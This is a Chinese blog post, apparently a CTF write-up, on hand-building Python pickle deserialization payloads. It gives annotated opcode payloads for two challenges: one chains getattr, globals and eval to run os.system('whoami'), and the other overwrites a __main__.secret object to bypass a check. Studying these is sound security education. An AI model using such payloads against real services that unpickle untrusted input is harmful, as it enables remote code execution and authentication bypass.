python pickle反序列化漏洞_python pickle从零构造反序列化攻击利用

本文深入探讨Python pickle模块的反序列化漏洞,通过实例解析如何构造反序列化攻击。首先引用了一篇详细的文章,并对手写反序列化部分进行补充。文章介绍了如何利用getattr、globals等内置方法构建payload,实现命令执行。接着分析了一个具体的例子,展示如何覆盖变量以利用漏洞。
摘要由CSDN通过智能技术生成

有一篇很好的文章对此讲的很详细

https://xz.aliyun.com/t/7436#toc-0

此外我对文章中的手写反序列化一块进行一些补充

几道例题Code-Breaking:picklecode

原payload:b'''cbuiltins

getattr

p0

(cbuiltins

dict

S'get'

tRp1

cbuiltins

globals

)Rp2

00g1

(g2

S'builtins'

tRp3

0g0

(g3

S'eval'

tR(S'__import__("os").system("whoami")'

tR.

'''(建议复制到python去看)

首先要声明的一点是反序列化的利用栈是从底端往上的,清楚汇编的同学应该了解这一点

我的注解

b'''白名单REC

cbuiltins #import

getattr  #获取builtins白名单方法getattr

p0  #将getattr压入mem0,字典保存

(cbuiltins    mark元素c模块builtins方法dict压栈

dict

S'get'  声明元素字符串'get'

tRp1

# 创建元组(builtins.dict,'get')调用getattr(dict,get)并将结果压入mem0,保存为1号元素

cbuiltins

globals  #获取builtins属性globals

)Rp2

# 创建一个空元组,调用globals(), 结果压入mem,保存为2号元素

00g1 #去除栈顶两个元素,将mem1号元素压栈,为dict.get

(g2  #mark g2 取出mem中2号元素压栈并mark,为globals()结果

S'builtins' # 定义字符串对象'builtins'

tRp3

# dict.get(globals(),'builtins')并将结果压入mem3空间。(windows这里实测需要__builtins__

0g0 #清栈,载入g0 getattr

(g3  # 载入g3并mark

S'eval'

tR

# getattr(builtins,'eval')结果压栈

(S'__import__("os").system("whoami")'

tR.

# 压入字符串,命令执行

'''高校战疫网络安全分享赛:webtmp

原payload:

b'''c__main__

secret

(S'name'

S"1"

S"category"

S"2"

db0(S"1"

S"2"

i__main__

Animal

.'''

我的注解

b'''变量覆盖题

c__main__  #导入主模块

secret # 主模块的secret

(S'name'

S"1"

S"category"

S"2"

db0

#d 定义了个字典

#b 覆盖掉secret中的同名字段

#0 清栈

(S"1"

S"2"

i__main__

Animal

#调用验证方法,这就是题目中的验证类了,盲猜类使用了__main__.secret做验证

.'''

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值